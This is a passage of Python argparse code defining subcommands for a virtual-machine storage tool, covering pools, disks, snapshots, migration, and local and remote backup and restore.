type=str,\n help=\"storage pool type to use\")\n\nparser_autostart_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to autostart\")\nparser_autostart_pool.add_argument(\"--disable\", metavar=\"[DISABLE]\", type=bool, nargs='?', const=True,\n help=\"disable autostart\")\n\n# set default func\nparser_autostart_pool.set_defaults(func=autoStartPoolParser)\n\n# -------------------- add stopPool cmd ----------------------------------\nparser_stop_pool = subparsers.add_parser(\"stopPool\", help=\"stopPool help\")\nparser_stop_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_stop_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to stop\")\n# set default func\nparser_stop_pool.set_defaults(func=stopPoolParser)\n\n# -------------------- add showPool cmd ----------------------------------\nparser_show_pool = subparsers.add_parser(\"showPool\", help=\"showPool help\")\nparser_show_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_show_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to show\")\n# set default func\nparser_show_pool.set_defaults(func=showPoolParser)\n\n# -------------------- add createDisk cmd ----------------------------------\nparser_create_disk = subparsers.add_parser(\"createDisk\", help=\"createDisk help\")\nparser_create_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"disk type to use\")\nparser_create_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\n\nparser_create_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n\n# will transfer to --size when type in nfs or glusterfs\nparser_create_disk.add_argument(\"--capacity\", required=True, metavar=\"[CAPACITY]\", type=str,\n help=\"capacity is the size of the volume to be created, as a scaled integer (see NOTES above), defaulting to bytes\")\nparser_create_disk.add_argument(\"--format\", metavar=\"[raw|bochs|qcow|qcow2|vmdk|qed]\", type=str,\n help=\"format is used in file based storage pools to specify the volume file format to use; raw, bochs, qcow, qcow2, vmdk, qed.\")\n\n# set default func\nparser_create_disk.set_defaults(func=createDiskParser)\n\n# -------------------- add deleteDisk cmd ----------------------------------\nparser_delete_disk = subparsers.add_parser(\"deleteDisk\", help=\"deleteDisk help\")\nparser_delete_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_delete_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_delete_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_delete_disk.set_defaults(func=deleteDiskParser)\n\n# -------------------- add resizeDisk cmd ----------------------------------\nparser_resize_disk = subparsers.add_parser(\"resizeDisk\", help=\"resizeDisk help\")\nparser_resize_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_resize_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_resize_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_resize_disk.add_argument(\"--capacity\", required=True, metavar=\"[CAPACITY]\", type=str,\n help=\"new volume capacity to use\")\nparser_resize_disk.add_argument(\"--vmname\", metavar=\"[VMNAME]\", type=str,\n help=\"new volume capacity to use\")\n# set default func\nparser_resize_disk.set_defaults(func=resizeDiskParser)\n\n# -------------------- add cloneDisk cmd ----------------------------------\nparser_clone_disk = subparsers.add_parser(\"cloneDisk\", help=\"cloneDisk help\")\nparser_clone_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_clone_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_clone_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_clone_disk.add_argument(\"--newname\", required=True, metavar=\"[NEWNAME]\", type=str,\n help=\"new volume name to use\")\nparser_clone_disk.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"format to use\")\n# set default func\nparser_clone_disk.set_defaults(func=cloneDiskParser)\n\n# -------------------- add registerDiskToK8s cmd ----------------------------------\nparser_register_disk = subparsers.add_parser(\"registerDiskToK8s\", help=\"register disk to k8s help\")\nparser_register_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_register_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_register_disk.set_defaults(func=registerDiskToK8sParser)\n\n# -------------------- add rebaseDiskSnapshot cmd ----------------------------------\nparser_rebase_snapshot = subparsers.add_parser(\"rebaseDiskSnapshot\", help=\"rebase disk snapshot help\")\nparser_rebase_snapshot.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_rebase_snapshot.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_rebase_snapshot.set_defaults(func=rebaseDiskSnapshotParser)\n\n# -------------------- add prepareDisk cmd ----------------------------------\nparser_prepare_disk = subparsers.add_parser(\"prepareDisk\", help=\"prepareDisk help\")\nparser_prepare_disk.add_argument(\"--domain\", metavar=\"[DOMAIN]\", type=str,\n help=\"storage pool to use\")\nparser_prepare_disk.add_argument(\"--vol\", metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_prepare_disk.add_argument(\"--path\", metavar=\"[PATH]\", type=str,\n help=\"volume uni to use\")\n# set default func\nparser_prepare_disk.set_defaults(func=prepareDiskParser)\n\n# -------------------- add releaseDisk cmd ----------------------------------\nparser_release_disk = subparsers.add_parser(\"releaseDisk\", help=\"releaseDisk help\")\nparser_release_disk.add_argument(\"--domain\", metavar=\"[DOMAIN]\", type=str,\n help=\"domain to use\")\nparser_release_disk.add_argument(\"--vol\", metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_release_disk.add_argument(\"--path\", metavar=\"[PATH]\", type=str,\n help=\"volume path to use\")\n# set default func\nparser_release_disk.set_defaults(func=releaseDiskParser)\n\n# -------------------- add showDisk cmd ----------------------------------\nparser_show_disk = subparsers.add_parser(\"showDisk\", help=\"showDisk help\")\nparser_show_disk.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_show_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_show_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\n# set default func\nparser_show_disk.set_defaults(func=showDiskParser)\n\n# -------------------- add showDiskSnapshot cmd ----------------------------------\nparser_show_disk_snapshot = subparsers.add_parser(\"showDiskSnapshot\", help=\"showDiskSnapshot help\")\nparser_show_disk_snapshot.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_show_disk_snapshot.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_show_disk_snapshot.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"volume name to use\")\nparser_show_disk_snapshot.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name\")\n# set default func\nparser_show_disk_snapshot.set_defaults(func=showDiskSnapshotParser)\n\n# -------------------- add createExternalSnapshot cmd ----------------------------------\nparser_create_ess = subparsers.add_parser(\"createExternalSnapshot\", help=\"createExternalSnapshot help\")\nparser_create_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_create_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_create_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to use\")\nparser_create_ess.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"disk format to use\")\nparser_create_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_create_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_create_ess.set_defaults(func=createExternalSnapshotParser)\n\n# -------------------- add revertExternalSnapshot cmd ----------------------------------\nparser_revert_ess = subparsers.add_parser(\"revertExternalSnapshot\", help=\"revertExternalSnapshot help\")\nparser_revert_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_revert_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_revert_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to use\")\nparser_revert_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_revert_ess.add_argument(\"--format\", required=True, metavar=\"[FORMAT]\", type=str,\n help=\"disk format to use\")\nparser_revert_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_revert_ess.set_defaults(func=revertExternalSnapshotParser)\n\n# -------------------- add deleteExternalSnapshot cmd ----------------------------------\nparser_delete_ess = subparsers.add_parser(\"deleteExternalSnapshot\", help=\"deleteExternalSnapshot help\")\nparser_delete_ess.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_delete_ess.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\nparser_delete_ess.add_argument(\"--name\", required=True, metavar=\"[NAME]\", type=str,\n help=\"volume snapshot name to use\")\nparser_delete_ess.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"disk current file to use\")\nparser_delete_ess.add_argument(\"--domain\", metavar=\"[domain]\", type=str,\n help=\"domain\")\n# set default func\nparser_delete_ess.set_defaults(func=deleteExternalSnapshotParser)\n\n# -------------------- add updateDiskCurrent cmd ----------------------------------\nparser_upodate_current = subparsers.add_parser(\"updateDiskCurrent\", help=\"updateDiskCurrent help\")\nparser_upodate_current.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_upodate_current.add_argument(\"--current\", required=True, metavar=\"[CURRENT]\", type=str, nargs='*',\n help=\"disk current file to use\")\n# set default func\nparser_upodate_current.set_defaults(func=updateDiskCurrentParser)\n\n# -------------------- add customize cmd ----------------------------------\nparser_customize = subparsers.add_parser(\"customize\", help=\"customize help\")\nparser_customize.add_argument(\"--add\", required=True, metavar=\"[ADD]\", type=str,\n help=\"storage pool type to use\")\nparser_customize.add_argument(\"--user\", required=False, metavar=\"[USER]\", type=str,\n help=\"disk current file to use\")\nparser_customize.add_argument(\"--password\", required=False, metavar=\"[PASSWORD]\", type=str,\n help=\"disk current file to use\")\nparser_customize.add_argument(\"--ssh_inject\", required=False, metavar=\"[SSH_INJECT]\", type=str,\n help=\"disk ssh-inject\")\n# set default func\nparser_customize.set_defaults(func=customizeParser)\n\n# -------------------- add createDiskFromImage cmd ----------------------------------\nparser_create_disk_from_image = subparsers.add_parser(\"createDiskFromImage\", help=\"createDiskFromImage help\")\nparser_create_disk_from_image.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\nparser_create_disk_from_image.add_argument(\"--name\", required=True, metavar=\"[name]\", type=str,\n help=\"new disk name to use\")\nparser_create_disk_from_image.add_argument(\"--targetPool\", required=True, metavar=\"[targetPool]\", type=str,\n help=\"storage pool to use\")\nparser_create_disk_from_image.add_argument(\"--source\", required=True, metavar=\"[source]\", type=str,\n help=\"disk source to use\")\nparser_create_disk_from_image.add_argument(\"--full_copy\", metavar=\"[full_copy]\", type=bool, nargs='?', const=True,\n help=\"if full_copy, new disk will be created by snapshot\")\n# set default func\nparser_create_disk_from_image.set_defaults(func=createDiskFromImageParser)\n\n# -------------------- add migrate cmd ----------------------------------\nparser_migrate = subparsers.add_parser(\"migrate\", help=\"migrate help\")\nparser_migrate.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\nparser_migrate.add_argument(\"--ip\", required=True, metavar=\"[IP]\", type=str,\n help=\"storage pool type to use\")\nparser_migrate.add_argument(\"--offline\", metavar=\"[OFFLINE]\", type=bool, nargs='?', const=True,\n help=\"support migrate offline\")\n# set default func\nparser_migrate.set_defaults(func=migrateParser)\n\n# -------------------- add migrateDisk cmd ----------------------------------\nparser_migrate_disk = subparsers.add_parser(\"migrateDisk\", help=\"migrate disk help\")\nparser_migrate_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol to migrate\")\nparser_migrate_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"target storage pool to use\")\n# set default func\nparser_migrate_disk.set_defaults(func=migrateDiskParser)\n\n# -------------------- add migrateVMDisk cmd ----------------------------------\nparser_migrate_vm_disk = subparsers.add_parser(\"migrateVMDisk\", help=\"migrateVMDisk help\")\nparser_migrate_vm_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\nparser_migrate_vm_disk.add_argument(\"--ip\", required=True, metavar=\"[IP]\", type=str,\n help=\"storage pool type to use\")\nparser_migrate_vm_disk.add_argument(\"--migratedisks\", required=True, metavar=\"[MIGRATEDISKS]\", type=str,\n help=\"vol opt to migrate\")\n# parser_migrate_vm_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n# help=\"target storage pool to use\")\n# set default func\nparser_migrate_vm_disk.set_defaults(func=migrateVMDiskParser)\n\n# -------------------- add restoreDisk cmd ----------------------------------\nparser_change_disk_pool = subparsers.add_parser(\"changeDiskPool\", help=\"changeDiskPool help\")\nparser_change_disk_pool.add_argument(\"--xml\", required=True, metavar=\"[XML]\", type=str,\n help=\"vm disk to backup\")\n# set default func\nparser_change_disk_pool.set_defaults(func=changeDiskPoolParser)\n\n# -------------------- add migrateVMDisk cmd ----------------------------------\nparser_modify_vm = subparsers.add_parser(\"modifyVM\", help=\"modifyVM help\")\nparser_modify_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to migrate\")\n# parser_migrate_vm_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n# help=\"target storage pool to use\")\n# set default func\nparser_modify_vm.set_defaults(func=modifyVMParser)\n\n# -------------------- add exportVM cmd ----------------------------------\nparser_export_vm = subparsers.add_parser(\"exportVM\", help=\"exportVM help\")\nparser_export_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_export_vm.add_argument(\"--path\", required=True, metavar=\"[PATH]\", type=str,\n help=\"vm disk file to export\")\n# set default func\nparser_export_vm.set_defaults(func=exportVMParser)\n\n# -------------------- add backupVM cmd ----------------------------------\nparser_backup_vm = subparsers.add_parser(\"backupVM\", help=\"backupVM help\")\nparser_backup_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_backup_vm.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_backup_vm.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_backup_vm.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"all vm disk\")\nparser_backup_vm.add_argument(\"--full\", required=False, metavar=\"[FULL]\", type=bool, nargs='?', const=True,\n help=\"full backup\")\nparser_backup_vm.add_argument(\"--remote\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_backup_vm.add_argument(\"--port\", required=False, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_backup_vm.add_argument(\"--username\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server username.\")\nparser_backup_vm.add_argument(\"--password\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_backup_vm.set_defaults(func=backupVMParser)\n\n# -------------------- add restoreVM cmd ----------------------------------\nparser_restore_vm = subparsers.add_parser(\"restoreVM\", help=\"restoreVM help\")\nparser_restore_vm.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_restore_vm.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_restore_vm.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"all vm disk\")\nparser_restore_vm.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_restore_vm.add_argument(\"--newname\", required=False, metavar=\"[NEWNAME]\", type=str,\n help=\"name when create a new domain\")\nparser_restore_vm.add_argument(\"--target\", required=False, metavar=\"[TARGET]\", type=str,\n help=\"use target pool to create a new domain\")\n# set default func\nparser_restore_vm.set_defaults(func=restoreVMParser)\n\n# -------------------- add backupDisk cmd ----------------------------------\nparser_backup_disk = subparsers.add_parser(\"backupDisk\", help=\"backupDisk help\")\nparser_backup_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_backup_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_backup_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_backup_disk.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_backup_disk.add_argument(\"--full\", required=False, metavar=\"[FULL]\", type=bool, nargs='?', const=True,\n help=\"full backup\")\nparser_backup_disk.add_argument(\"--remote\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_backup_disk.add_argument(\"--port\", required=False, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_backup_disk.add_argument(\"--username\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server username.\")\nparser_backup_disk.add_argument(\"--password\", required=False, metavar=\"[REMOTE]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_backup_disk.set_defaults(func=backupDiskParser)\n\n# -------------------- add restoreDisk cmd ----------------------------------\nparser_restore_disk = subparsers.add_parser(\"restoreDisk\", help=\"restoreDisk help\")\nparser_restore_disk.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_restore_disk.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_restore_disk.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_restore_disk.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_restore_disk.add_argument(\"--newname\", required=False, metavar=\"[NEWNAME]\", type=str,\n help=\"name when create a new domain\")\nparser_restore_disk.add_argument(\"--target\", required=False, metavar=\"[TARGET]\", type=str,\n help=\"use target pool to create a new domain\")\nparser_restore_disk.add_argument(\"--targetDomain\", required=False, metavar=\"[TARGETDOMAIN]\", type=str,\n help=\"target domain to attach disk\")\n# set default func\nparser_restore_disk.set_defaults(func=restoreDiskParser)\n\n# -------------------- add showDiskPool cmd ----------------------------------\nparser_show_disk_pool = subparsers.add_parser(\"showDiskPool\", help=\"showDiskPool help\")\nparser_show_disk_pool.add_argument(\"--path\", required=True, metavar=\"[PATH]\", type=str,\n help=\"vm disk path\")\n# set default func\nparser_show_disk_pool.set_defaults(func=showDiskPoolParser)\n\n# -------------------- add deleteVMBackup cmd ----------------------------------\nparser_delete_vm_backup = subparsers.add_parser(\"deleteVMBackup\", help=\"restoreVM help\")\nparser_delete_vm_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_vm_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_delete_vm_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\n# set default func\nparser_delete_vm_backup.set_defaults(func=deleteVMBackupParser)\n\n# -------------------- add deleteVMDiskBackup cmd ----------------------------------\nparser_delete_vm_disk_backup = subparsers.add_parser(\"deleteVMDiskBackup\", help=\"restoreVM help\")\nparser_delete_vm_disk_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_vm_disk_backup.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_delete_vm_disk_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"vm domain backup pool, must shared type, like nfs\")\nparser_delete_vm_disk_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\n# set default func\nparser_delete_vm_disk_backup.set_defaults(func=deleteVMDiskBackupParser)\n\n# -------------------- add deleteRemoteBackup cmd ----------------------------------\nparser_delete_remote_backup = subparsers.add_parser(\"deleteRemoteBackup\", help=\"restoreVM help\")\nparser_delete_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_delete_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_delete_remote_backup.add_argument(\"--pool\", required=False, metavar=\"[POOL]\", type=str,\n help=\"vm pool to backup\")\nparser_delete_remote_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_delete_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_delete_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_delete_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_delete_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_delete_remote_backup.set_defaults(func=deleteRemoteBackupParser)\n\n# -------------------- add pullRemoteBackup cmd ----------------------------------\nparser_pull_remote_backup = subparsers.add_parser(\"pullRemoteBackup\", help=\"pullRemoteBackup help\")\nparser_pull_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_pull_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_pull_remote_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_pull_remote_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_pull_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_pull_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_pull_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_pull_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_pull_remote_backup.set_defaults(func=pullRemoteBackupParser)\n\n# -------------------- add pushBackup cmd ----------------------------------\nparser_push_backup = subparsers.add_parser(\"pushBackup\", help=\"pushBackup help\")\nparser_push_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_push_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_push_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_push_backup.add_argument(\"--version\", required=True, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_push_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_push_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_push_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_push_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_push_backup.set_defaults(func=pushBackupParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_create_cloud_init = subparsers.add_parser(\"createCloudInitUserDataImage\",\n help=\"createCloudInitUserDataImage help\")\nparser_create_cloud_init.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_create_cloud_init.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\nparser_create_cloud_init.add_argument(\"--userData\", required=False, metavar=\"[USERDATA]\", type=str,\n help=\"userData\")\n# set default func\nparser_create_cloud_init.set_defaults(func=createCloudInitUserDataImageParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_delete_cloud_init = subparsers.add_parser(\"deleteCloudInitUserDataImage\",\n help=\"deleteCloudInitUserDataImage help\")\nparser_delete_cloud_init.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_delete_cloud_init.add_argument(\"--vol\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\n# set default func\nparser_delete_cloud_init.set_defaults(func=deleteCloudInitUserDataImageParser)\n\n# -------------------- add createCloudInitUserDataImage cmd ----------------------------------\nparser_update_os = subparsers.add_parser(\"updateOS\", help=\"deleteCloudInitUserDataImage help\")\nparser_update_os.add_argument(\"--domain\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_update_os.add_argument(\"--source\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_update_os.add_argument(\"--target\", required=True, metavar=\"[VOL]\", type=str,\n help=\"vol\")\n# set default func\nparser_update_os.set_defaults(func=updateOSParser)\n\n# -------------------- add cleanBackup cmd ----------------------------------\nparser_clean_backup = subparsers.add_parser(\"cleanBackup\", help=\"cleanBackup help\")\nparser_clean_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_clean_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_clean_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\nparser_clean_backup.add_argument(\"--version\", required=False, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_clean_backup.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"full clean\")\n# set default func\nparser_clean_backup.set_defaults(func=cleanBackupParser)\n\n# -------------------- add cleanBackup cmd ----------------------------------\nparser_clean_remote_backup = subparsers.add_parser(\"cleanRemoteBackup\", help=\"cleanRemoteBackup help\")\nparser_clean_remote_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_clean_remote_backup.add_argument(\"--pool\", required=False, metavar=\"[POOL]\", type=str,\n help=\"vm pool to backup\")\nparser_clean_remote_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_clean_remote_backup.add_argument(\"--version\", required=False, metavar=\"[VERSION]\", type=str,\n help=\"backup version id\")\nparser_clean_remote_backup.add_argument(\"--all\", required=False, metavar=\"[ALL]\", type=bool, nargs='?', const=True,\n help=\"full clean\")\nparser_clean_remote_backup.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_clean_remote_backup.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_clean_remote_backup.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_clean_remote_backup.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\n# set default func\nparser_clean_remote_backup.set_defaults(func=cleanRemoteBackupParser)\n\n# -------------------- add scanBackup cmd ----------------------------------\nparser_scan_backup = subparsers.add_parser(\"scanBackup\", help=\"scanBackup help\")\nparser_scan_backup.add_argument(\"--domain\", required=True, metavar=\"[DOMAIN]\", type=str,\n help=\"vm domain to export\")\nparser_scan_backup.add_argument(\"--vol\", required=False, metavar=\"[VOL]\", type=str,\n help=\"vm disk to backup\")\nparser_scan_backup.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"backup to store\")\n# set default func\nparser_scan_backup.set_defaults(func=scanBackupParser)\n\n# -------------------- add deleteRemoteBackupServer cmd ----------------------------------\nparser_delete_remote_backup_server 